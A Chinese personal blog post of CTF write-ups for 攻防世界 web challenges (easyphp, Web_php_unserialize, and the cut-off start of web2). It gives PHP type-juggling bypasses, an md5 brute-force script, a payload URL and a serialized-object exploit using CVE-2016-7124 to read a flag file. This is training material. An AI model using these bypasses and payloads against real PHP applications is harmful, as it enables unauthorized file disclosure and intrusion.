<!DOCTYPE html>


<html lang="zh-CN">
  

    <head>
      <meta charset="utf-8" />
        
      <meta name="description" content="本网站是个人兴趣爱好，总结分享经验，记录生活点滴的平台，希望在以后的学习旅途中，走出自己的风景。" />
      
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>攻防世界-web |  n0rt6&#39;s bolg</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.jpg" />
       
<link rel="stylesheet" href="/dist/main.css">

      
<link rel="stylesheet" href="/css/fonts/remixicon.css">

      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.staticfile.org/pace/1.2.4/pace.min.js"></script>
       
 

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/npm/@sweetalert2/theme-bulma@5.0.1/bulma.min.css"
      />
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.0.19/dist/sweetalert2.min.js"></script>

      <!-- mermaid -->
      
      <style>
        .swal2-styled.swal2-confirm {
          font-size: 1.6rem;
        }
      </style>
    </head>
  </html>
</html>


<body>
  <!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--点击爱心-->
<script type="text/javascript" src="\js\clickLove.js"></script>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-攻防世界-web"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  攻防世界-web
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2023/03/18/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-web/" class="article-date">
  <time datetime="2023-03-18T08:36:21.000Z" itemprop="datePublished">2023-03-18</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C/">攻防世界</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">11 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <meta name="referrer" content="no-referrer"/>

<h2 id="easyphp"><a href="#easyphp" class="headerlink" title="easyphp"></a>easyphp</h2><p><img src="https://img-blog.csdnimg.cn/777b9016dc7d4931934149f054da6fb2.png" alt="1"></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$key1</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token variable">$key2</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>

<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'a'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'b'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">intval</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">6000000</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span> <span class="token operator">&lt;=</span> <span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token string single-quoted-string">'8b184b'</span> <span class="token operator">===</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">,</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$key1</span> <span class="token operator">=</span> <span class="token number">1</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
            <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Emmm...再想想"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Emmm..."</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token variable">$c</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword type-casting">array</span><span class="token punctuation">)</span><span class="token function">json_decode</span><span class="token punctuation">(</span>@<span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'c'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_array</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token operator">!</span><span class="token function">is_numeric</span><span class="token punctuation">(</span>@<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"m"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"m"</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">2022</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_array</span><span class="token punctuation">(</span>@<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">2</span> <span class="token operator">&amp;&amp;</span> <span class="token function">is_array</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$d</span> <span class="token operator">=</span> <span class="token function">array_search</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"DGGJ"</span><span class="token punctuation">,</span> <span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$d</span> <span class="token operator">===</span> <span class="token constant boolean">false</span><span class="token operator">?</span><span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"no..."</span><span class="token punctuation">)</span><span class="token punctuation">:</span><span class="token class-name return-type">NULL</span><span class="token punctuation">;</span>
        <span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span> <span class="token keyword">as</span> <span class="token variable">$key</span><span class="token operator">=></span><span class="token variable">$val</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
            <span class="token variable">$val</span><span class="token operator">===</span><span class="token string double-quoted-string">"DGGJ"</span><span class="token operator">?</span><span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"no......"</span><span class="token punctuation">)</span><span class="token punctuation">:</span><span class="token class-name return-type">NULL</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token variable">$key2</span> <span class="token operator">=</span> <span class="token number">1</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"no hack"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"no"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$key1</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$key2</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">include</span> <span class="token string double-quoted-string">"Hgfks.php"</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token string double-quoted-string">"You're right"</span><span class="token operator">.</span><span class="token string double-quoted-string">"\n"</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token variable">$flag</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>采用科学计数法绕过a&#x3D;9e9</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">intval</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">6000000</span> <span class="token operator">&amp;&amp;</span> <span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span> <span class="token operator">&lt;=</span> <span class="token number">3</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>编写脚本</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token variable">$i</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span> <span class="token variable">$i</span> <span class="token operator">&lt;</span><span class="token number">1000000</span> <span class="token punctuation">;</span> <span class="token variable">$i</span><span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'8b184b'</span> <span class="token operator">===</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$i</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token operator">-</span><span class="token number">6</span><span class="token punctuation">,</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">echo</span> <span class="token variable">$i</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;br>'</span><span class="token operator">.</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$i</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>得到<br><img src="https://img-blog.csdnimg.cn/be82814851a4407c84b59756e4a81c42.png" alt="2"><br>即b&#x3D;53724</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token variable">$c</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token keyword type-casting">array</span><span class="token punctuation">)</span><span class="token function">json_decode</span><span class="token punctuation">(</span>@<span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'c'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">#接收json格式的字符串并将其转化为数组</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>了解一下json格式<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/74151127">JSON数据格式详解</a></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_array</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token operator">!</span><span class="token function">is_numeric</span><span class="token punctuation">(</span>@<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"m"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"m"</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">2022</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>用c&#x3D;{“m”:”2222c”}绕过，</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_array</span><span class="token punctuation">(</span>@<span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token function">count</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">2</span> <span class="token operator">&amp;&amp;</span> <span class="token function">is_array</span><span class="token punctuation">(</span><span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>c&#x3D;{“m”:”2222c”,”n”:[[1],0]}</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token variable">$d</span> <span class="token operator">=</span> <span class="token function">array_search</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"DGGJ"</span><span class="token punctuation">,</span> <span class="token variable">$c</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>默认的第三个flase参数导致了弱类型比较漏洞。当我们的$c[“n”]&#x3D;0的时候(或者null)，会将前面要查找的字符串自动转化为0然后进行比较。<br>绕过手法<strong>c&#x3D;{“m”:”2222c”,”n”:[[],0]}</strong><br>payload：<code>http://61.147.171.105:54356?a=9e9&amp;b=53724&amp;c=&#123;&quot;m&quot;:&quot;2222c&quot;,&quot;n&quot;:[[0],0]&#125;</code></p>
<p><img src="https://img-blog.csdnimg.cn/4707ba60885b4bab8b4c6a5e663060b4.png" alt="3"></p>
<h2 id="Web-php-unserialize"><a href="#Web-php-unserialize" class="headerlink" title="Web_php_unserialize"></a>Web_php_unserialize</h2><p><img src="https://img-blog.csdnimg.cn/e550b56fa030492b9f805746e000103b.png" alt="1"></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token keyword">class</span> <span class="token class-name-definition class-name">Demo</span> <span class="token punctuation">&#123;</span> 
    <span class="token keyword">private</span> <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">=</span> <span class="token variable">$file</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">echo</span> @<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">,</span> <span class="token constant boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">!=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
            <span class="token comment">//the secret is in the fl4g.php</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span> 
        <span class="token punctuation">&#125;</span> 
    <span class="token punctuation">&#125;</span> 
<span class="token punctuation">&#125;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'var'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
    <span class="token variable">$var</span> <span class="token operator">=</span> <span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'var'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/[oc]:\d+:/i'</span><span class="token punctuation">,</span> <span class="token variable">$var</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'stop hacking!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
        @<span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$var</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span> 
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span> 
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"index.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">&#125;</span> 
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>由代码可知，flag文件很有可能在fl4g.php里。<br>分析一下代码：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">!=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
            <span class="token comment">//the secret is in the fl4g.php</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span> 
        <span class="token punctuation">&#125;</span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这段代码会将我们要找的文件替换为index.php。<br>本题的php版本为<strong>PHP&#x2F;5.3.10-1</strong>，可以使用<strong>cve漏洞</strong>绕过_wakeup()。</p>
<blockquote>
<p>CVE-2016-7124(绕过__wakeup)<br>漏洞影响版本：<br>PHP5 &lt; 5.6.25<br>PHP7 &lt; 7.0.10</p>
</blockquote>
<blockquote>
<p>漏洞产生原因：<br>如果存在__wakeup方法，调用 unserilize() 方法前则先调用__wakeup方法，但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 </p>
</blockquote>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'var'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
    <span class="token variable">$var</span> <span class="token operator">=</span> <span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'var'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/[oc]:\d+:/i'</span><span class="token punctuation">,</span> <span class="token variable">$var</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'stop hacking!'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
        @<span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$var</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>绕过正则表达式，首先解释一下<code>&#39;/[oc]:\d+:/i&#39;</code>，<code>[oc]</code>：匹配到o或c，<code>\d</code>：整型数。也就是匹配到类似**O:2:<strong>的会输出</strong>stop hacking!<strong>如何绕过呢？我们把</strong>O:2:<strong>改成</strong>O:+2:**不就行了？<br>具体代码：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span> 
<span class="token keyword">class</span> <span class="token class-name-definition class-name">Demo</span> <span class="token punctuation">&#123;</span> 
    <span class="token keyword">private</span> <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">=</span> <span class="token variable">$file</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">echo</span> @<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">,</span> <span class="token constant boolean">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">!=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span> 
            <span class="token comment">//the secret is in the fl4g.php</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span> 
        <span class="token punctuation">&#125;</span> 
    <span class="token punctuation">&#125;</span> 
<span class="token punctuation">&#125;</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">x</span><span class="token punctuation">&#123;</span>
	<span class="token keyword">private</span> <span class="token variable">$file</span><span class="token operator">=</span><span class="token string single-quoted-string">'fl4g.php'</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$a</span><span class="token operator">=</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">Demo</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'fl4g.php'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$a</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;br>'</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'O:4:'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'O:+4:'</span><span class="token punctuation">,</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//绕过正则表达式</span>
<span class="token keyword">echo</span> <span class="token variable">$a</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;br>'</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">':1:'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">':2:'</span><span class="token punctuation">,</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//绕过_wakeup()函数</span>
<span class="token keyword">echo</span> <span class="token variable">$a</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;br>'</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$a</span><span class="token operator">.</span><span class="token string single-quoted-string">'&lt;br>'</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><em><em>$file 是私有成员序列化之后字符串首尾会多出两个空格 “%00</em>%00”，所以base64加密最好在代码中执行防止复制漏掉</em>*<br>运行之后得到<br><img src="https://img-blog.csdnimg.cn/4f6b3bfcae2a4126ae4efcdb8ec73965.png" alt="2"><br>get传参得到flag。<br><img src="https://img-blog.csdnimg.cn/6a5689494cef49759c2f6d74d441bd2f.png" alt="3"><br>这个题很有学习价值！！！</p>
<h2 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h2><p><img src="https://img-blog.csdnimg.cn/183c9b29277e4ee497d4f342aad251b0.png" alt="4"></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$miwen</span><span class="token operator">=</span><span class="token string double-quoted-string">"a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function-definition function">encode</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token variable">$_o</span><span class="token operator">=</span><span class="token function">strrev</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment">// echo $_o;</span>
        
